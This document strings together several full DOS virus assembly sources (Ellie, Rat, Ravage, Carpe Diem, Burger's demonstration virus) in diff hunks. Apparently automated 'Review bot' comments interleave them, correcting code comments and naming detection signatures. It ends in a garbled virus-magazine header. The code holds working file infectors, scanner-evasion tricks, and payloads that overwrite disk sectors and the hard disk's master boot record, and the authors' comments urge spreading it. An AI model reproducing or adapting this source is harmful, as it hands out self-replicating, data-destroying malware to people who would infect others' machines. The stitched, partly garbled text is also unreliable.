ELLIE: ; Here comes the bitch..
cli ; Tigh her up!
mov ah,2 ; starting with drive C
cwd ; starting at sector 0
mov cx,0100h ; write 256 sectors
int 026h ; to protect and serve..
jmp maria ; Next victim is Maria..
MARIA: ;Yet another..
MOV AL,3 ;Set to fry drive D
MOV CX,700 ;Set to write 700 sectors
MOV DX,00 ;Starting at sector 0
MOV DS,[DI+99] ;Put random crap in DS
MOV BX,[DI+55] ;More crap in BX
CALL ELLIE ;Jump for joy!...
; ÄÄ-ÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-ÄÄÄÄ-
; If you want Ellie to go off on some special month, just look at procedure
; "Infect_file", and the call to daycheck. Change the call to Monthcheck,
; and "delete" the ";" on procedure monthcheck. But remember, that makes,
; the virus much less destructive, and by that time, all scanners has
; probably added a new scan-string on this one. Now it will go off the
; 10:th every month. Feel free to modify this as much you want to.
; MONTHCHECK: ; Procudure to check
; mov ah,2ah ; what month it is..
; int 21h ; Dos to your service..
; cmp dh,06 ; comp dh,06 (July, month 06)
; je daycheck ; if month 06, jump to daycheck,
; JMP something ; if not, just jump to something..
; ÄÄ-ÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-ÄÄÄÄ-
Daycheck: ; check what day it is..
mov ah,2ah ;
int 21h ; Dos to your service..
cmp dl,10 ; If it is the 10:th,
je ellie ; if yes, have a great fuck..
JMP something ; if not..just can tell you how sorry I'm !
Something: ; Some stupid procedure..but remember..
ret ; Arbeit Macht Frei !
exit_virus:
cmp files_found,15 ; Are at least 15 files infected?
jl print_fake ; If not, keep a low profile
cmp success,0 ; Did we infect anything?
jg print_fake ; If so, cover it up
mov ah,09h ; Use DOS print string service
mov dx,offset virus_msg1 ; Load address of the first line
int 21h ; Print it..
; mov dx,offset virus_msg2 ; ---
; int 21h ; Okey..mess(ages) 2-5 have been
; mov dx,offset virus_msg3 ; removed from the code..too bad,
; int 21h ; they were Metallica messages...
; mov dx,offset virus_msg4 ; ---
; int 21h ; Anyway, (ab)use this program, B4
; mov dx,offset virus_msg5 ; Mcafee gets a new string for this
; int 21h ; ---
jmp terminate ; Jump to terminate..
print_fake:
mov ah,09h ; Print fake error message
mov dx,offset fake_msg ; Print "fake_msg"
int 21h ; Dos to your service..
terminate: ; Get ready for quit this program
mov ah,4ch ; DOS terminate process function
int 21h ; Exit..
filler db 8 dup (90h) ; Pad out to 666 bytes
main endp
code ends
end main
; Greeting goes out to : Raver, Metal Militia, Scavenver,
; and of-cuz to Miss Perfect...ELLIE!
+127
@@ -0,0 +1,127 @@
PAGE 59,132
;*************************************
;**The Rat Virus - Overwriting **
;** Non-Resident **
;** Com File Infector**
;** Author: -Ajax- **
;** This virus is 92 bytes long **
;** Because it is made in 1992 :) **
;**/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/**
;** Pass this unscannable around to **
;** Your friends,and tell em McAfee **
;** sent ya! **
;**/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/**
;** Underground Asylum-904/688.6494 **
;**"Replication Is Our Middle Name!"**
;*************************************
retf macro ret_count ; Fixup for Assembler
ifdef ret_count
db 0CAh
dw ret_count
elseif
db 0CBh
endif
endm
retn macro ret_count
ifdef ret_count
db 0C2h
dw ret_count
elseif
db 0C3h
endif
endm
movseg macro reg16, unused, Imm16 ; Fixup for Assembler
ifidn <reg16>, <bx>
db 0BBh
endif
ifidn <reg16>, <cx>
db 0B9h
endif
ifidn <reg16>, <dx>
db 0BAh
endif
ifidn <reg16>, <si>
db 0BEh
endif
ifidn <reg16>, <di>
db 0BFh
endif
ifidn <reg16>, <bp>
db 0BDh
endif
ifidn <reg16>, <sp>
db 0BCh
endif
ifidn <reg16>, <BX>
db 0BBH
endif
ifidn <reg16>, <CX>
db 0B9H
endif
ifidn <reg16>, <DX>
db 0BAH
endif
ifidn <reg16>, <SI>
db 0BEH
endif
ifidn <reg16>, <DI>
db 0BFH
endif
ifidn <reg16>, <BP>
db 0BDH
endif
ifidn <reg16>, <SP>
db 0BCH
endif
dw seg Imm16
endm
location_file equ 9Eh ; location of file in DTA
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h ; Starting of all .COM files
rat_virus proc far
start:
mov ah,4Eh ; fixup for making undetectable
mov cl,20h ;
mov dx,offset all_com_files ;
int 21h ;
;
start_infecting:
mov ax,3D01h ;
mov dx,Location_file ;
int 21h ; Open target file.
mov bx,ax
mov dx,offset ds:[100h] ; Location of file to write.
mov cl,5ch ; File size to overwrite.
mov ah,40h ;
int 21h ; Write to filename in dx
;
mov ah,3Eh ;
int 21h ;
;
mov ah,4Fh ;
int 21h ;
;
jnc start_infecting ; If more files,keep goin
mov ah,09h ;
mov dx,offset bbs_ad ; display my bbsad!
int 21h
int 20h ; get to dos.
all_com_files db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 00h ; data for all com files
; in current dir..
bbs_ad db 'Underground Asylum BBS - [904]688.6494$'
rat_virus endp
seg_a ends
end start
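Review bot: The `retf`, `retn` and `movseg` macros that open the listing are never invoked — every instruction inside `rat_virus` is a plain mnemonic — so the "Fixup for Assembler" scaffolding is dead text that should be dropped or marked `; unused — carried over from a shared template`. The header comment only says "Overwriting"; it should state plainly that the 40h write at `start_infecting` replaces the first 5Ch bytes of each target with no copy of the original kept, so every matched .COM file is destroyed rather than infected in any recoverable sense. The header's "unscannable" claim is contradicted by the code itself: the body is a fixed byte sequence and both data items (`all_com_files`, `bbs_ad`) are plaintext constants that never vary between targets, which is exactly what a static byte signature keys on.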

@@ -0,0 +1,254 @@
; Virusname: Ravage
; Origin: Sweden
; Author: Metal Militia
; This virus can be found with any anti-virus program, since it's been
; around for a while now. (SCAN/TB-SCAN/F-PROT/SOLOMON, that is..)
; It's a resident .COM and .EXE infector, without any encryption or
; stealth capabilities. It infects when you execute (4bh), opens (3dh),
; extended open (6ch), and on closing (3eh). This makes it quite a good
; infector, but since it doesn't care what files it infects, most of the
; AV programs will find themselves makes it quite a good infector, but
; any program with selfchecking (95%) will find themself hit.
; I stopped with this virus since it's so totally buggy that you'll find
; it almost at once. This is the reason why i give you the source code.
; In my later resident things, there will be such things as encryption,
; stealth etc. i think..
.model tiny
.code
.radix 16
.code
EXE_ID = -42
viruslength = heap - _small
startload = 90 * 4
_small:
call relative
oldheader dw 020cdh
dw 0bh dup (0)
relative:
pop bp
push ds
push es
xor ax,ax
mov ds,ax
mov es,ax
mov di,startload
cmp word ptr ds:[di+25],di
jz exit_small
lea si,[bp-3]
mov cx,viruslength
db 2Eh
rep movsb
mov di,offset old21 + startload
mov si,21*4
push si
movsw
movsw
pop di
mov ax,offset int21 + startload
stosw
xchg ax,cx
stosw
exit_small:
pop es
pop ds
or sp,sp
jnp returnCOM
returnEXE:
mov ax,ds
add ax,10
add [bp+16],ax
add ax,[bp+0e]
mov ss,ax
mov sp,cs:[bp+10]
jmp dword ptr cs:[bp+14]
returnCOM:
mov di,100
push di
mov si,bp
movsw
movsb
ret
infect:
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
mov ax,4300h
int 21h
jnc test_it
jmp exitinfect
test_it:
test cl,1
je ok_2_open
and cl,0feh
mov ax,4301h
int 21h
jnc ok_2_open
jmp exitinfect
ok_2_open:
mov ax,3d02
int 21
xchg ax,bx
push cs
pop ds
push cs
pop es
mov ax,5700h
int 21h
push cx
push dx
mov si,offset oldheader+startload
mov ah,3f
mov cx,18
push cx
mov dx,si
int 21
cmp ax,cx
jnz go_already_infected
mov di,offset target + startload
push di
rep movsb
pop di
mov ax,4202
cwd
int 21
cmp ds:[di],'ZM'
jz infectEXE
cmp ds:[di],'MZ'
jz infectEXE
sub ax,3
mov byte ptr ds:[di],0e9
mov ds:[di+1],ax
sub ax,viruslength
cmp ds:[si-17],ax
jnz finishinfect
go_already_infected:
pop cx
jmp short already_infected
int21:
cmp ax,4b00
jz infect
cmp ax,3d00
jz infect
cmp ax,3e00
jz some_open
cmp ax,6c00
jnz not_opening
some_open:
mov ah,45
int 21
jmp infect
not_opening:
jmp chain
infectEXE:
cmp word ptr [di+10],EXE_ID
jz go_already_infected
push ax
push dx
add ax,viruslength
adc dx,0
mov cx,200
div cx
or dx,dx
jz nohiccup
inc ax
nohiccup:
mov word ptr ds:[di+4],ax
mov word ptr ds:[di+2],dx
pop dx
pop ax
mov cx,10
div cx
sub ax,ds:[di+8]
mov word ptr ds:[di+14],dx
mov word ptr ds:[di+16],ax
mov word ptr ds:[di+0e],ax
mov word ptr ds:[di+10],EXE_ID
finishinfect:
mov cx,viruslength
mov ah,40
mov dx,startload
int 21
mov ax,4200
xor cx,cx
cwd
int 21
mov ah,40
mov dx,di
pop cx
int 21
already_infected:
pop dx
pop cx
mov ax,5701h
int 21h
mov ah,3e
int 21
jmp exitinfect
db 'RAVAGE! '
db '(c) Metal Militia / Immortal Riot'
exitinfect:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
chain:
db 0ea
heap:
old21 dw ?, ?
target dw 0ch dup (?)
endheap:
end _small
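Review bot: The header's list of hooked calls does not match `int21`: each test there compares the full AX (`cmp ax,3e00` and siblings, under `.radix 16`), so the "on closing (3eh)" claim holds only for the AL=0 case, and the header should describe the actual behaviour instead. For an analyst, two stable artifacts are visible in this hunk: the resident copy is placed at `startload = 90 * 4` in segment 0 (i.e. inside the interrupt vector table, with `old21` and `target` in the `heap` area immediately after it), and infected EXE headers carry `EXE_ID` at header offset 10h, which with the radix directive in force is -42h; both are worth a comment at the definitions since they are what detection logic would key on. The duplicated `.code` directive at the top is harmless but redundant and should be removed.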
+292
@@ -0,0 +1,292 @@
; VirusName : CARPE DIEM! - Seize the day
; Origin : Sweden
; Author : Raver
; Date : 16/11/93
; Well this is my (Raver's) first scratch virus.
; This virus is mainly made for educational purpose (my own!).
; It's pretty well commented in an easy way so even you folks
; with little experience with assembler should be able to follow
; the code!
; It's a pretty simple non-overwriting .com-infector with a harmless
; nuking routine. It clears and restores the file attributes and
; date/time stamp and finds and infects files using the dot-dot method.
; An encryption routine and some "unusual" instructions are included to
; avoid detection by the common virus scanners. At release date, see
; above, neither F-prot nor Tb-scan found traces of virus code!
; There is about a 5 percent chance that the nuking routine will be
; activated, it checks the system time for 1/100 of a second. If it's
; activated it'll overwrite the first sector on the fixed disk (c:)
; which contains the boot sector. This might seem cruel but, infact,
; it's quite harmless 'cause norton utilities and other programs
; easily restore the boot sector. It's there just to make inexperienced
; users (lamers!) nervous!
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; CARPE DIEM! - Seize the day
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
cseg segment byte public 'code'
assume cs:cseg, ds:cseg
org 100h
start_of_virus: ;entry point
call get_off ;this somewhat unusual code won't
get_off: ;produce a flexible entry point flag
mov si,sp ;get the delta offset
mov bp,word ptr ss:[si] ;offset is on top of stack
sub bp,offset get_off ;put it in bp
inc sp ;restore sp to it's original
inc sp
; call encrypt_decrypt ;decrypt the contents of the program
mov ax,bp ;use alternative code - otherwise
add ax,116h ;f-prot will recognize it as Radyum!!!!
push ax
jmp encrypt_decrypt
jmp encrypted_code_start ;jmp to the (en/de)crypted virus area
encryption_value dw 0 ;random value for encryption routine
write_virus_to_file: ;proc to append virus code to file
call encrypt_decrypt ;encrypt the virus before write
mov cx,offset end_of_virus-100h ;length of virus to be written
lea dx,[bp] ;write from start
mov ax,word ptr [bp+end_of_virus+1ah+2] ;most significant part of
inc ah ;file length in DTA. Is
add dx,ax ;always 0 in .com-files.
mov ah,40h ;Use this trick to fool
int 21h ;heuristic searches.
;dx = delta offset+100h
call encrypt_decrypt ;decrypt the code for
ret ;further processing.
encrypt_decrypt: ;proc to (en/de)crypt the code
mov dx,word ptr [bp+encryption_value] ;use random number for every
lea si,[bp+encrypted_code_start] ;new infection
mov cx,(end_of_virus-encrypted_code_start+1)/2
crypt_loop: ;xor the whole virus code
xor word ptr [si],dx ;between encrypted_code_start
add si,2 ;and end_of_virus
loop crypt_loop
ret
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; Here the part that will be encrypted starts, i.e. all code
; except the encryption routine and the routine to append virus
; to file.
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
encrypted_code_start:
cld
mov ah,1ah ;Set DTA Transfer area to after
lea dx,[bp+end_of_virus] ;after the end of file to save file
int 21h ;size. Note: do not use default 80h
;as DTA area since the parameters to
;the "real" program will be overwritten!
lea si,[bp+orgbuf] ;Transfer buffer contents
lea di,[bp+orgbuf2] ;to be restored to the beginning
mov cx,2 ;for restart of the "real" program
rep movsw
mov di,2 ;Infection counter, 2 files every run
mov ah,19h ;get current drive
int 21h
cmp al,2 ;check if a: or b:
jae get_cur_dir ;if so, skip infection. Otherwise
jmp no_more_files ;the user will most likely get
;quite suspicious
get_cur_dir:
mov ah,47h ;get starting directory
xor dl,dl ;it will be changed by the
lea si,[bp+end_of_virus+2ch] ;dot-dot method later on
int 21h
find_first: ;start finding the first .com file
mov cx,7 ;in every new dir
lea dx,[bp+filespec]
mov ah,4eh
int 21h
jnc clear_attribs ;successive?
call ch_dir ;no more files in dir. change dir
jmp find_first ;start over again
;otherwise jmp
find_next: ;this is the upper point of the find
mov ah,4fh ;files loop in a dir
int 21h
jnc clear_attribs
call ch_dir ;no more files in dir. change dir
jmp find_first ;start over again
clear_attribs: ;set the file attribute to 0
mov ax,4301h
xor cx,cx
lea dx,[bp+end_of_virus+1eh]
int 21h
open_file: ;open file to be infected
mov ax,3d02h
; lea dx,[bp+end_of_virus+1eh] ;since clear_attribs
int 21h
xchg ax,bx ;Put file handle in bx
read_file: ;read first four bytes of file
mov ah,3fh ;They will be restore to the start
mov cx,4 ;after the virus is finnished
lea dx,[bp+orgbuf] ;so the program can execute
int 21h
check_already_infected: ;check the first to bytes and check
mov si,dx ;if the file is already infected
lea si,[bp+orgbuf]
cmp word ptr [si],0e990h
je already_infected ;if so, jmp
cmp word ptr [bp+end_of_virus+35],'DN' ;check if command.com
jz already_infected ;if so, don't infect
mov ax,word ptr [bp+end_of_virus+1ah] ;check file size
cmp ax,500 ;and skip short and
jb already_infected ;long files
cmp ax,64000
ja already_infected
mov ax,4202h ;get lenght of initial jmp in ax
xor cx,cx
xor dx,dx
int 21h
sub ax,4 ;subtract the first four bytes, which
;will be overwritten
mov word ptr [bp+startbuf],0e990h ;load the buffer with a nop
mov word ptr [bp+startbuf+2],ax ;and a jmp to virus beginning
;notice the reversed order!
mov ax,4200h ;move to beginning of file
int 21h
mov ah,40h ;write the new instructions
mov cx,4
lea dx,[bp+startbuf]
int 21h
mov ax,4202h ;move to end of file
xor cx,cx
xor dx,dx
int 21h
mov ah,2ch ;get a random number from
int 21h ;system clock for the
mov word ptr [bp+encryption_value],dx ;encryption routine
call write_virus_to_file ;append the virus code
jmp restore_time_date
already_infected: ;if already encrypted increase
inc di ;infection counter with one
restore_time_date: ;restore file time & date
lea si,[bp+end_of_virus+16h]
mov cx,word ptr [si]
mov dx,word ptr [si+2]
mov ax,5701h
int 21h
close_file: ;close the file handle
mov ah,3eh
int 21h
set_old_attrib: ;restore the old file attrib
mov ax,4301h
xor ch,ch
mov cl,byte ptr [bp+end_of_virus+15h]
lea dx,[bp+end_of_virus+1eh]
int 21h
dec di ;decrease infection counter
cmp di,0 ;and check if infection is
jbe no_more_files ;completed
jmp find_next
no_more_files:
mov ah,2ch ;get a new random number
int 21h ;5% chance of nuke
cmp dl,5
ja restore_start ;above 5 no nuke
mov ax,0301h ;trash the bootsector of c:
mov cx,0001h ;This might seem cruel but
mov dx,0080h ;norton and other programs
lea bx,[bp+start_of_virus] ;easily fix it. It's just
int 13h ;to make the user nervous!!
mov ah,09h ;deliver a message too
lea dx,[bp+signature]
int 21h
restore_start: ;copy the four saved bytes to
lea si,[bp+orgbuf2] ;beginning of file in memory
mov di,100h
movsw
movsw
restore_dir: ;change back to original
lea dx,[bp+end_of_virus+2ch] ;dir
mov ah,3bh
int 21h
exit_proc: ;return to start of program
mov bx,100h ;This will be enrypted in
push bx ;infected files, so anti-vir
;progs won't complain.
xor ax,ax ;for org virus to push on
retn ;the stack for ret
ch_dir:
lea dx,[bp+dot_dot] ;use dot-dot method
mov ah,3bh
int 21h
jnc no_err ;sub dir existed
pop ax ;otherwise all files are checked. exit!
jmp no_more_files ;pop the ip pointer from the stack
no_err: ;and jump to the end part
ret
signature db "CARPE DIEM! (c) '93 - Raver/Immortal Riot",0ah,0dh,'$'
country db " Sweden 16/11/93"
filespec db '*.com',0
dot_dot db '..',0
orgbuf db 90h,90h,50h,0c3h ;instructions to exit the
orgbuf2 db 4 dup(0) ;scratch after infection
startbuf db 4 dup(0) ;nop,nop,push ax,ret
end_of_virus:
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; The virus code ends here but the point below here (the heap)
; is used to store temporary variables such as the dta-area and
; the starting directory
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
cseg ends
end start_of_virus
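Review bot: The header's "quite harmless" description of the payload is wrong and should be corrected: `mov ax,0301h / mov cx,0001h / mov dx,0080h / int 13h` at `no_more_files` writes one sector to cylinder 0, head 0, sector 1 of drive 80h, which is the master boot record and partition table of the first hard disk, not merely "the boot sector"; until that table is rebuilt no partition on the disk is reachable, so the comment understates the impact. The "5 percent" figure is also off: `cmp dl,5 / ja restore_start` on the 0–99 hundredths value returned by function 2Ch fires for six values. From a detection standpoint, the decryptor (`start_of_virus` through `encrypt_decrypt`) and the `0e990h` nop/jmp marker written into the host's first bytes are constant across infections even though the remainder is XOR-keyed per file — a note to that effect at `encrypted_code_start` would make the "avoid detection" paragraph in the header honest.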
+461
@@ -0,0 +1,461 @@
page 70,120
Name VIRUS
;*************************************************************************
; Program Virus Ver.: 1.1
; Copyright by R. Burger 1986
; This is a demonstration program for computer
; viruses. It has the ability to replicate itself,
; and thereby modify other programs
;*************************************************************************
Code Segment
Assume CS:Code
progr equ 100h
ORG progr
;*************************************************************************
; The three NOP's serve as the marker byte of the
; virus which will allow it to identify a virus
;*************************************************************************
MAIN:
nop
nop
nop
;*************************************************************************
; Initialize the pointers
;*************************************************************************
mov ax,00
mov es:[pointer],ax
mov es:[counter],ax
mov es:[disks],al
;*************************************************************************
; Get the selected drive
;*************************************************************************
mov ah,19h ; drive?
int 21h
;*************************************************************************
; Get the current path on the current drive
;*************************************************************************
mov cs:drive,al ; save drive
mov ah,47h ; dir?
mov ah,ah
mov si,si
mov dh,0
add al,1
mov dl,dl
nop ;****
mov dl,al
mov dl,dl
nop ;**** ; in actual drive
lea si,cs:old_path
int 21h
;*************************************************************************
; Get the number of drives present.
; If only one drive is present, the pointer for
; search order will be set to search order + 6
;*************************************************************************
mov ah,0eh ; how many disks
mov dl,0 ;****????
int 21h
mov al,01
cmp al,01 ; one drive?
jnz hups3
mov al,06
hups3: mov ah,0
lea bx,search_order
add bx,ax
add bx,0001h
mov cs:pointer,bx
clc
;*************************************************************************
; Carry is set, if no more .COM's are found.
; Then, to avoid unnecessary work, .EXE files will
; be renamed to .COM file and infected.
; This causes the error message "Program too large
; to fit in memory" when starting larger infected
; EXE programs.
;*************************************************************************
change_disk:
jnc no_name_change
mov ah,17h ; change exe to com
lea dx,cs:maske_exe
int 21h
cmp al,0ffh
jnz no_name_change ; .EXE found?
;*************************************************************************
; If neither .COM nor .EXE is found, then sectors will
; be overwritten depending on the system time in
; milliseconds. This is the time of the complete
; "infection" of a storage medium. The virus can find
; nothing more to infect and starts its destruction.
;*************************************************************************
; mov ah,2ch ; read system clock
; int 21h
; mov bx,cs:pointer
; mov al,cs:[bx]
; mov bx,dx
; nop ;****
; mov cx,2
; nop ;****
; mov dh,0
; int 26h ; write crap on disk
db ' RB2 - LiquidCode <tm> '
;*************************************************************************
; Check if the end of the search order table has been
; reached. If so, end.
;*************************************************************************
no_name_change:
mov bx,cs:pointer
dec bx
mov cs:pointer,bx
mov dl,cs:[bx]
cmp dl,0ffh
jnz hups2
jmp hops
;*************************************************************************
; Get new drive from search order table and
; select it.
;*************************************************************************
hups2:
mov ah,0eh
mov dl,2 ;***** +
int 21h ; change disk
;*************************************************************************
; Start in the root directory
;*************************************************************************
mov ah,3bh ; change path
lea dx,path
int 21h
jmp find_first_file
;*************************************************************************
; Starting from the root, search for the first subdir
; First convert all .EXE files to .COM in the old
; directory.
;*************************************************************************
find_first_subdir:
mov ah,17h ; change exe to com
lea dx,cs:maske_exe
int 21h
mov ah,3bh ; use root dir
lea dx,path
int 21h
mov ah,04eh ;Search for first subdirectory
mov cx,00010001b ; dir mask
lea dx,maske_dir
int 21h
jc change_disk
mov bx,CS:counter
INC BX
DEC bx
jz use_next_subdir
;*************************************************************************
; Search for the next subdir. If no more directories
; are found, the drive will be changed.
;*************************************************************************
find_next_subdir:
mov ah,4fh ; search for next subdir
int 21h
jc change_disk
dec bx
jnz find_next_subdir
;*************************************************************************
; Select found directory
;*************************************************************************
use_next_subdir:
mov ah,2fh ; get dta address
int 21h
add bx,1ch
mov es:[bx],'\ ' ; address of name in dta
inc bx
push ds
mov ax,es
mov ds,ax
mov dx,bx
mov ah,3bh ; change path
int 21h
pop ds
mov bx,cs:counter
inc bx
mov CS:counter,bx
;*************************************************************************
; Find first .COM file in the current directory.
; If there are non, search the next directory.
;*************************************************************************
find_first_file:
mov ah,04eh ; Search for first
mov cx,00000001b ; mask
lea dx,maske_com ;
int 21h
jc find_first_subdir
jmp check_if_ill
;*************************************************************************
; If the program is already infected, search for
; the next program.
;*************************************************************************
find_next_file:
mov ah,4fh ; search for next
int 21h
jc find_first_subdir
;*************************************************************************
; Check if already infected by the virus.
;*************************************************************************
check_if_ill:
mov ah,3dh ; open channel
mov al,02h ; read/write
mov dx,9eh ; address of name in dta
int 21h
mov bx,ax ; save channel
mov ah,3fh ; read file
mov cx,buflen ;
mov dx,buffer ; write in buffer
int 21h
mov ah,3eh ; CLOSE FILE
int 21h
;*************************************************************************
; Here we search for three NOP's.
; If present, there is already an infection. We must
; then continue the search.
;*************************************************************************
mov bx,cs:[buffer]
cmp bx,9090h
jz find_next_file
;*************************************************************************
; Bypass MS-DOS write protection if present
;*************************************************************************
mov ah,43h ; write enable
mov al,0
mov dx,9eh ; address of name in dta
int 21h
mov ah,43h
mov al,01h
and cx,11111110b
int 21h
;*************************************************************************
; Open file for write access.
;*************************************************************************
mov ah,3dh ; open channel
mov al,02h ; read/write
mov dx,9eh ; address of name in dta
int 21h
;*************************************************************************
; Read date entry of program and save for future use.
;*************************************************************************
mov bx,ax ; channel
mov ah,57h ; get date
mov al,0
int 21h
push cx ; save date
push dx
;*************************************************************************
; The jump located at address 0100h of the program
; will be saved for future use.
;*************************************************************************
mov dx,cs:[conta] ; save old jmp
mov cs:[jmpbuf],dx
mov dx,cs:[buffer+1] ; save new jump
lea cx,cont-100h
sub dx,cx
mov cs:[conta],dx
;*************************************************************************
; The virus copies itself to the start of the file
;*************************************************************************
mov ah,40h ; write virus
mov cx,buflen ; length buffer
lea dx,main ; write virus
int 21h
;*************************************************************************
; Enter the old creation date of the file.
;*************************************************************************
mov ah,57h ; write date
mov al,1
pop dx
pop cx ; restore date
int 21h
;*************************************************************************
; Close the file.
;*************************************************************************
mov ah,3eh ; close file
int 21h
;*************************************************************************
; restore the old jump address.
; The virus saves at address "conta' the jump which
; was at the start of the host program.
; This is done to preserve the executability of the
; host program as much as possible.
; After saving itstill works with the jump address
; contained in the virus. The jump address in the
; virus differs from the jump address in memory
;
;*************************************************************************
mov dx,cs:[jmpbuf] ; restore old jmp
mov cs:[conta],dx
hops: nop
call use_old
;*************************************************************************
; Continue with the host program.
;*************************************************************************
cont db 0e9h ; make jump
conta dw 0
mov ah,00
int 21h
;*************************************************************************
; reactivate the selected drive at the start of the
; program.
;*************************************************************************
use_old:
mov ah,0eh ; use old drive
mov dl,cs:drive
int 21h
;*************************************************************************
; Reactivate the selected path at the start of the
; program.
;*************************************************************************
mov ah,3bh ; use old dir
lea dx,old_path-1 ; get old path and backslash
int 21h
ret
search_order db 0ffh,1,0,2,3,0ffh,00,0ffh
pointer dw 0000 ; pointer f. search order
counter dw 0000 ; counter f. nth search
disks db 0 ; number of disks
maske_com db "*.com",00 ; search for com files
maske_dir db "*",00 ; search dir's
maske_exe db 0ffh,0,0,0,0,0,00111111b
db 0,"????????exe",0,0,0,0
db 0,"????????com",0
maske_all db 0ffh,0,0,0,0,0,00111111b
db 0,"???????????",0,0,0,0
db 0,"????????com",0
buffer equ 0e000h ; a safe place
buflen equ 230h ; length of virus !!!!!!
; careful
; if changing !!!!!!
jmpbuf equ buffer+buflen ; a safe place for jump
path db "\",0 ; first path
drive db 0 ; actual drive
back_slash db "\"
old_path db 32 dup(?) ; old path
code ends
end main
;*************************************************************************
; WHAT THE PROGRAM DOES:
;
; When the program is started, the first COM file in the root
; directory is infected. You can't see any changes to the
; directory entries. But if you look at the hex dump of an
; infected program, you can see the marker, which in this case
; consists of three NOP's (hex 90). WHen the infected program
; is started, the virus will first replicate itself, and then
; try to run the host program. It may run or it may not, but
; it will infect another program. This continues until all
; the COM files are infected. The next time it is run, all
; of the EXE files are changed to COM files so that they can
; be infected. In addition, the manipulation task of the virus
; begins, which consists of the random destruction of disk
; sectors.
;*************************************************************************

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
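Review bot: The drive-count check under "Get the number of drives present" is documented as a branch but cannot branch: `mov al,01` overwrites the AL returned by the 0Eh call immediately before `cmp al,01`, so `jnz hups3` is never taken and `mov al,06` always executes; the comment should say the check is inert and the +6 search-order offset is unconditional. The closing "WHAT THE PROGRAM DOES" text understates the damage: `find_first_subdir` issues the FCB rename (`mov ah,17h` with `maske_exe`) every time a directory runs out of .COM files, not only "the next time it is run", so .EXE files in every traversed directory are renamed on the first execution. The "three NOP's" marker described above `check_if_ill` is actually tested as one word compare against 9090h, i.e. two NOPs, which the comment should reflect.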
+391
@@ -0,0 +1,391 @@
;ÛßßßßßßßßßßßßßßßÛ ß ß ÛÛßÛÛßÛÛ
;Û STEALTH group Û° Û ÛßÜ Ûßß Üßß Üßß ßÛß Üßß ÛßÛ Ý Û ÜßÛ Û Üßß Üßß ÛÛ ßß ÛÛ
;Û presents Û° Û Û Û Ûß Ûß Û Û Ûß Û Û Û Û Û Û Û Û ßÛßß ÛÛÛÛÛ ÛÛ
;ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÛ° Þ Þ Þ Þ ÞÜÜ ÞÜÜ Þ ÞÜÜ ÞÜß ßÛ ßÜÛ Þ ÞÜÜ ÞÜÜ ÛÛÛÛÛÜÛÛ
; °°°°°°°°°°°°°°°°° JAN 1995
;
; INFECTED VOICE. Issue 4. January 1995. (C) STEALTH group, Kiev 148, Box 10.
; THE FIRST UNIQUE VIRUS MAGAZINE IN FORMER U.S.S.R.!!!
;
;--- RCE-385 (!).-------------------------------------------------------------
; ª¨¥ ®¤­ ª® ¢à¥¬¥­  ¯®è«¨ - ®¡ì«áï ­¥ª¨© ¤ï¤î誠 Œ®á⮢®© ¨ ­ ¯¨á « ᢮©
